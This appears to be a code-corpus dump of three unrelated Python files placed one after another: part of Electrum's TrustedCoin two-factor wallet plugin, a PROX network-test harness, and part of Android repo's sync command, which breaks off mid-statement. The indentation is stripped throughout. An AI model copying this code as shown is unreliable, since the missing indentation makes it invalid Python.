def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.print_error("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_index = billing_info['billing_index']
billing_address = make_billing_address(wallet, billing_index)
if billing_address != billing_info['billing_address']:
raise Exception('unexpected trustedcoin billing address: expected {}, received {}'
.format(billing_address, billing_info['billing_address']))
wallet.add_new_billing_address(billing_index, billing_address)
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum.mnemonic import Mnemonic
from electrum.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, email, wizard):
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.storage.get('x1/')['xpub'] != xpub1 or
wizard.storage.get('x2/')['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
prox.py
|
#!/bin/env python
##
# Copyright(c) 2010-2015 Intel Corporation.
# Copyright(c) 2016-2018 Viosoft Corporation.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
import threading
from time import *
from proxsocket import *
from remotesystem import *
class ProxStarter:
def __init__(self, remoteSystem, cmd):
self._remoteSystem = remoteSystem
self._cmd = cmd
self._thread = None
self._prox = None;
self._result = None;
self._startDuration = None
def startThreaded(self):
self._start_thread = threading.Thread(target = self._run, args = (self, 1))
self._start_thread.start();
def joinThreaded(self):
self._start_thread.join();
return self._result;
def getResult(self):
return self._result;
def getStartDuration(self):
return self._startDuration;
def getProx(self):
return self._prox;
def _run(self, a, b):
before = time.time()
self._remoteSystem.run("sudo killall -w -q -9 prox")
self._result = self._remoteSystem.run(self._cmd);
sleep(1)
after = time.time()
self._startDuration = after - before;
class StatsCmd(object):
def __init__(self, prox):
self._cmd = ""
self._parts = []
self._beforeParts = []
self._prox = prox;
def sendRecv(self):
cmd = self.getCmd()
reply = self._prox._send(cmd)._recv()
self.setReply(reply)
def add(self, stats):
if (len(self._cmd) != 0):
self._cmd += ","
self._cmd += stats
if (len(self._parts) == 0):
self._beforeParts += [0]
else:
before = self._parts[-1] + self._beforeParts[-1];
self._beforeParts += [before]
self._parts += [stats.count(",") + 1];
def getCmd(self):
return "stats " + self._cmd;
def setReply(self, reply):
self._reply = reply.split(",");
def getResult(self, idx):
start = self._beforeParts[idx];
end = start + self._parts[idx];
return self._reply[start:end]
class Prox(object):
def __init__(self, systemConfig):
self._systemConfig = systemConfig;
self._proxStarter = None
user = self._systemConfig._user
ip = self._systemConfig._ip
self._remoteSystem = remoteSystem(user, ip);
self.resetArguments()
def resetArguments(self):
self._args = []
def addArgument(self, arg):
self._args.append(arg);
def startFork(self):
cmd = self.getCmd();
self._proxStarter = ProxStarter(self._remoteSystem, cmd)
self._proxStarter.startThreaded();
def startJoin(self):
ret = self.startJoinNoConnect();
self._connectSocket();
self._querySetup();
return self._proxStarter.getStartDuration();
def startJoinNoConnect(self):
return self._proxStarter.joinThreaded();
def getCmd(self):
proxDir = self._systemConfig.getProxDir();
cfgFile = self._systemConfig.getCfgFile();
cmd = "cd " + proxDir + "; "
cmd += "sudo ./build/prox "
cmd += "-f " + cfgFile
for arg in self._args:
cmd += " " + arg
return cmd
def getLog(self):
proxDir = self._systemConfig.getProxDir()
cmd = "cat " + proxDir + "/prox.log";
return self._remoteSystem.run(cmd)["out"];
def getIP(self):
return self._systemConfig._ip;
def getHz(self):
return self._hz;
def getBeg(self):
return self._beg;
def getPorts(self):
return self._ports;
def getIerrors(self):
sc = StatsCmd(self)
sc.add(self._buildIerrorsCmd());
sc.sendRecv()
return self._parseIerrorsReply(sc.getResult(0));
def _parseIerrorsReply(self, rep):
tot_ierrors = 0;
for e in rep:
tot_ierrors += int(e);
return tot_ierrors;
def _buildIerrorsCmd(self):
cmd = ""
for port in self._ports:
if (len(cmd)):
cmd += ","
cmd += "port(%s).ierrors" % str(port)
return cmd;
def waitCmdFinished(self):
self._send("stats hz")._recv();
def waitAllLinksUp(self):
link_down = True;
while (link_down):
link_down = False;
for port in self._ports:
cmd = "port link state %s" % str(port)
link_state = self._send(cmd)._recv();
if (link_state == "down"):
link_down = True;
print "Link down on port " + str(port) + ", waiting one second"
break;
sleep(1);
def startAllCores(self):
self._send("start all");
def stopAllCores(self):
self._send("stop all");
def forceQuit(self):
self._send("quit_force")._recv();
def killProx(self):
self._remoteSystem.run("sudo killall -w -q -9 prox")
def getTsc(self):
return self._getTsc();
def _getTsc(self):
return int(self._send("stats global.tsc")._recv());
def scpStatsDump(self, dst):
proxDir = self._systemConfig.getProxDir()
src = proxDir + "/stats_dump";
print "Copying " + src + " to " + dst
self._remoteSystem.scp(src, dst);
def _querySetup(self):
print "Query setup on " + str(self.getIP())
self._queryHz()
self._queryBeg()
self._queryPorts()
self._querySetup2()
def _querySetup2(self):
print "running query 2"
pass
def quitProx(self):
self._send("quit")._recv();
def _queryHz(self):
self._hz = int(self._send("stats hz")._recv());
def _queryBeg(self):
self._beg = self._getTsc();
def _queryPorts(self):
self._ports = []
port_info_all = self._send("port info all")._recv();
port_info_list = port_info_all.split(',');
for port_info in port_info_list:
if (len(port_info) > 0):
self._ports.append(int(port_info.split(":")[0]));
def _connectSocket(self):
self._proxSocket = ProxSocket(self.getIP())
def _send(self, msg):
self._proxSocket.send(msg);
return self
def _recv(self):
return self._proxSocket.recv();
|
sync.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
from pyversion import is_python3
if is_python3():
import http.cookiejar as cookielib
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
else:
import cookielib
import imp
import urllib2
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
The -f/--force-broken option can be used to proceed with syncing
other projects if a project sync fails.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object direcotry. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help="continue sync even if a project fails to sync")
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads when jobs are > 1.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and not opt.force_broken:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we call sem.release().
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
prune=opt.prune)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync',
file=sys.stderr)
else:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)' \
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching projects', len(projects),
print_newline=not(opt.quiet),
always_print_percentage=opt.quiet)
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
err_event = _threading.Event()
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.isSet() and not opt.force_broken:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event)
if self.jobs > 1:
t = _threading.Thread(target = self._FetchProjectList,
kwargs = kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet() and not opt.force_broken:
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects)
return fetched
def _GCProjects(self, projects):
gc_gitdirs = {}
for project in projects:
if len(project.manifest.GetProjectsWithName(project.name)) > 1:
print('Shared project %s found, disabling pruning.' % project.name)
project.bare_git.config('--replace-all', 'gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count / jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def _DeleteProject(self, path):
print('Deleting obsolete path %s' % path, file=sys.stderr)
# Delete the .git directory first, so we're less likely to have a partially
# working git repository around. There shouldn't be any git projects here,
# so rmtree works.
try:
platform_utils.rmtree(os.path.join(path, '.git'))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(path, '.git'), str(e)), file=sys.stderr)
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return -1
# Delete everything under the worktree, except for directories that contain
# another git project
dirs_to_remove = []
failed = False
for root, dirs, files in platform_utils.walk(path):
for f in files:
try:
platform_utils.remove(os.path.join(root, f))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, f), str(e)), file=sys.stderr)
failed = True
dirs[:] = [d for d in dirs
if not os.path.lexists(os.path.join(root, d, '.git'))]
dirs_to_remove += [os.path.join(root, d) for d in dirs
if os.path.join(root, d) not in dirs_to_remove]
for d in reversed(dirs_to_remove):
if platform_utils.islink(d):
try:
platform_utils.remove(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
elif len(platform_utils.listdir(d)) == 0:
try:
platform_utils.rmdir(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
continue
if failed:
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return -1
# Try deleting parent dirs if they are empty
project_dir = path
while project_dir != self.manifest.topdir:
if len(platform_utils.listdir(project_dir)) == 0:
platform_utils.rmdir(project_dir)
else:
break
project_dir = os.path.dirname(project_dir)
return 0
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
for path in old_project_paths:
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest = self.manifest,
name = path,
